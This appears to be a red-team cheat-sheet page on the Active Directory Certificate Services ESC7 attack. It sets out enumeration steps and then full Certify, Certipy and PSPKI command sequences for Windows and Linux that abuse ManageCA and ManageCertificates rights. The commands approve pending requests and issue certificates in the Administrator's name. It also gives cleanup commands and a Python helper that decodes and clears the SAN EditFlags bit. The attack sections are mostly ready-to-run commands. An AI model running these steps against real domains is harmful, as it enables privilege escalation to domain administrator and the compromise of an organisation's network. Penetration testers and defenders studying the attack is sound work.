
ESC7

Vulnerable Certificate Authority access control: two sets of CA permissions pose a security risk when held by low-privileged principals:

  • ManageCA (CA Administrator)
  • ManageCertificates (Certificate Manager)

Enumerate using certsrv.msc

PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.minions.com | Get-CertificationAuthorityAcl | select -expand Access

Query the CA with certutil (EditFlags value)

EDITF_ATTRIBUTESUBJECTALTNAME2 is set if the returned EditFlags value is 1376590.

PS /home/bobbuilder> certutil.exe -config "minions.com\CA-minions" -getreg "policy\EditFlags"

Enumerate using PSPKI module

PS /home/bobbuilder> Import-Module .\PSPKI.ps1
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.minions.com | Get-CertificationAuthorityAcl | select -ExpandProperty Access

Windows

Attack 1 (Allow SAN by flipping EDITF_ATTRIBUTESUBJECTALTNAME2)

A principal with ManageCA rights can change CA settings remotely with PSPKI, including toggling the EDITF_ATTRIBUTESUBJECTALTNAME2 flag (as in ESC6). With the flag on, a SAN can be specified in requests for any template. The ESC6 attack was patched in May 2022, so Attack 2 may be the better alternative on a patched CA.

Note: the flag change has no effect until the CA service (CertSvc) is restarted. ManageCA users have the right to restart it, but cannot do so remotely.

  1. Request a certificate from the template
PS /home/bobbuilder> .\certify.exe request /ca:<ca_name> /template:ApprovalNeeded
  2. Import the PSPKI module
PS /home/bobbuilder> Import-Module PSPKI
  3. Approve the pending request
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.minions.com | Get-PendingRequest -RequestID 3361 | Approve-CertificateRequest
  4. Download the approved request
PS /home/bobbuilder> .\certify.exe download /ca:<ca_name> /id:3361

Post Attack

Disable EDITF_ATTRIBUTESUBJECTALTNAME2 with PowerShell

PS /home/bobbuilder> $ConfigReader.SetConfigEntry(1114446,"EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
PS /home/bobbuilder> $ConfigReader.GetConfigEntry("EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
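As an added example (not code from the original page), a small offline helper that decodes the EditFlags value from certutil's `-getreg policy\EditFlags` output as used in the enumeration section, reports whether EDITF_ATTRIBUTESUBJECTALTNAME2 (0x40000) is set, and computes the cleared value to write back in the post-attack cleanup above. The certutil output is a constructed sample; the flag-name table is assumed from certsrv.h and covers only the bits relevant here.

```python
import re

# EDITF_* bits (assumed from certsrv.h) that appear in the two values on this page.
# Any other set bit is reported as UNKNOWN rather than guessed.
EDITF_FLAGS = {
    0x2: "EDITF_REQUESTEXTENSIONLIST",
    0x4: "EDITF_DISABLEEXTENSIONLIST",
    0x8: "EDITF_ADDOLDKEYUSAGE",
    0x40: "EDITF_BASICCONSTRAINTSCRITICAL",
    0x100: "EDITF_ENABLEAKIKEYID",
    0x10000: "EDITF_ENABLEDEFAULTSMIME",
    0x40000: "EDITF_ATTRIBUTESUBJECTALTNAME2",
    0x100000: "EDITF_ENABLECHASECLIENTDC",
}
EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x40000

# Constructed sample of `certutil -config "<ca_config>" -getreg policy\EditFlags`
# output on a CA where the SAN flag has been flipped on (value 1376590 from the page).
SAMPLE_CERTUTIL_OUTPUT = """\
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\CA-minions\\PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy:

  EditFlags REG_DWORD = 15014e (1376590)
CertUtil: -getreg command completed successfully.
"""

def parse_editflags(certutil_output: str) -> int:
    """Extract the EditFlags value from certutil -getreg output (hex and decimal must agree)."""
    m = re.search(r"EditFlags\s+REG_DWORD\s*=\s*([0-9a-fA-F]+)\s*\((\d+)\)", certutil_output)
    if not m:
        raise ValueError("EditFlags value not found in certutil output")
    value = int(m.group(2))
    if int(m.group(1), 16) != value:
        raise ValueError("hex and decimal EditFlags values disagree")
    return value

def decode_editflags(value: int) -> list:
    """Name every set bit; unknown bits are reported, not silently dropped."""
    names = []
    for bit in range(32):
        mask = 1 << bit
        if value & mask:
            names.append(EDITF_FLAGS.get(mask, f"UNKNOWN_0x{mask:x}"))
    return names

def san_flag_set(value: int) -> bool:
    """True when EDITF_ATTRIBUTESUBJECTALTNAME2 is on (ESC6/ESC7 SAN abuse possible)."""
    return bool(value & EDITF_ATTRIBUTESUBJECTALTNAME2)

def remediated_value(value: int) -> int:
    """EditFlags with EDITF_ATTRIBUTESUBJECTALTNAME2 cleared: the value to write back."""
    return value & ~EDITF_ATTRIBUTESUBJECTALTNAME2

if __name__ == "__main__":
    v = parse_editflags(SAMPLE_CERTUTIL_OUTPUT)
    print(f"EditFlags = {v} (0x{v:x}): {', '.join(decode_editflags(v))}")
    print("SAN flag set:", san_flag_set(v), "-> remediated EditFlags:", remediated_value(v))
```

Clearing the bit on 1376590 yields 1114446, the value the SetConfigEntry call above writes back; a CertSvc restart is still needed for it to take effect.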

Attack 2 (gain ManageCertificates rights using ManageCA)

This attack only needs the ManageCA permission. It also requires the Manage Certificates permission and the SubCA certificate template to be enabled, but both can be granted/enabled with ManageCA.

  1. Grant Manage Certificates access (optional, if we don't already have it)
PS /home/bobbuilder> .\certipy.exe ca -ca '<ca_name>' -add-officer user1 -username user1@minions.com -password password1
  2. Enable the SubCA certificate template (optional, the SubCA template is enabled by default)
PS /home/bobbuilder> .\certipy.exe ca -username user1@minions.com -password password1 -target-ip <ip> -ca '<ca_name>' -enable-template 'SubCA'
  3. Request a certificate based on the SubCA template
PS /home/bobbuilder> .\certipy.exe req -username user1@minions.com -password password1 -ca <ca_name> -target <ip> -template SubCA -upn administrator@minions.com
  4. Issue the failed (pending) request
PS /home/bobbuilder> .\certipy.exe ca -ca '<ca_name>' -issue-request 7851 -username user1@minions.com -password password1
  5. Retrieve the issued certificate
PS /home/bobbuilder> .\certipy.exe req -username user1@minions.com -password password1 -ca <ca_name> -target <ip> -retrieve 7851

Linux

Attack 1 (ManageCA rights)

  1. Add Manage Certificates access rights to user1
bob$ certipy ca -u 'user1@minions.com' -p 'password1' -ca <ca_name> -add-officer user1
  2. Request a certificate with a SAN (Enrollee Supplies Subject: True)
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -template SubCA -upn Administrator
  3. Issue the certificate
bob$ certipy ca -u 'user1@minions.com' -p 'password1' -ca <ca_name> -issue-request 311
  4. Retrieve the certificate by its request ID to authenticate with it
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -retrieve 311

Attack 2 (ManageCertificates rights)

  1. Request a certificate from a template that requires manager approval
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -template <template> -upn Administrator
  2. Approve the pending request
bob$ certipy ca -u 'user1@minions.com' -p 'password1' -ca <ca_name> -issue-request 591
  3. Retrieve the approved request
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -retrieve 591